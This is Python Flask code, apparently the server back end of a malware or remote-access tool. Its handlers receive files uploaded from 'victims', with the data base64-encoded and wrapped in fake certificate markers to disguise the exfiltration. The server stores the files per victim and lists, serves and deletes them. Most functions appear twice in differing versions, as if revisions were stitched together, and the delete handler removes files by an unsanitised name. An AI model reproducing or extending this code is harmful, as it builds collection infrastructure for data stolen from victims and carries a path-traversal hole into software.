def deleteUpload(): filename = request.form.get('filename').strip() signature = request.form.get('signature').strip() u = upload.upload() u.delete(filename) os.remove(config.upload_dir + os.sep + signature + os.sep + filename) return 'success'
def upload_controller(signature): c = victim.victim() u = upload.upload() pattern = r"^[0-9a-f]{32}$" if not re.match(pattern, signature): return 'error' if not c.get(signature): return 'error' data = unquote(request.get_data()) data = data.replace('-----BEGIN CERTIFICATE-----', '') data = data.replace('-----END CERTIFICATE-----', '') data = data.strip() try: data = base64.b64decode(data) except Exception as e: return 'error' originalname = request.args.get('filename') pid = request.args.get('pid') filename = ntpath.basename(originalname) + '.' + md5(data) if not os.path.exists(upload_dir + os.sep + signature): os.mkdir(upload_dir + os.sep + signature, 0700) with open(upload_dir + os.sep + signature + os.sep + filename, 'w') as f: f.write(data) u.add(signature, pid, originalname, filename) resp = make_response(filename, 200) return resp
def upload_controller(signature): c = victim.victim() u = upload.upload() pattern = r"^[0-9a-f]{32}$" if not re.match(pattern, signature): return 'error' if not c.get(signature): return 'error' data = unquote(request.get_data()) data = data.replace('-----BEGIN CERTIFICATE-----', '') data = data.replace('-----END CERTIFICATE-----', '') data = data.strip() try: data = base64.b64decode(data) except Exception as e: print e return 'error' originalname = request.args.get('filename') pid = request.args.get('pid') filename = md5(data) with open(upload_dir+os.sep+filename, 'wb') as f: f.write(data) u.add(signature, pid, originalname, filename) resp = make_response(filename, 200) return resp
def showUploads(): u = upload.upload() signature = request.form.get("signature").strip() files = u.getlist() if files: for i in xrange(len(files)): files[i]["id"] = i return json.dumps(files) return "[]"
def showUploads(): u = upload.upload() signature = request.form.get('signature').strip() files = u.getbyclient(signature) if files: for i in xrange(len(files)): files[i]['id'] = i return json.dumps(files) return '[]'
def getUploadedFileByPid(): pid = request.args.get("pid") if not pid: return "error" pattern = r"^[0-9a-f]{32}$" if not re.match(pattern, pid): return "error" # get filename by pid a = upload.upload() result = a.getbypid(pid) filename = result["filename"] originalname = result["originalname"] if not os.path.exists(config.upload_dir + os.sep + filename): return "error" with open(config.upload_dir + os.sep + filename, "r") as f: data = f.read() # TODO: change content-type and use originalname return data
def getUploadedFileByPid(): pid = request.args.get('pid') if not pid: return 'error' pattern = r"^[0-9a-f]{32}$" if not re.match(pattern, pid): return 'error' #get filename by pid a = upload.upload() result = a.getbypid(pid) filename = result['filename'] originalname = result['originalname'] signature = result['signature'] if not os.path.exists(config.upload_dir + os.sep + signature + os.sep + filename): return 'error' with open(config.upload_dir + os.sep + signature + os.sep + filename, 'r') as f: data = f.read() #TODO: change content-type and use originalname return data
def deleteUpload(): filename = request.form.get("filename").strip() u = upload.upload() u.delete(filename) os.remove(config.upload_dir + os.sep + filename) return "success"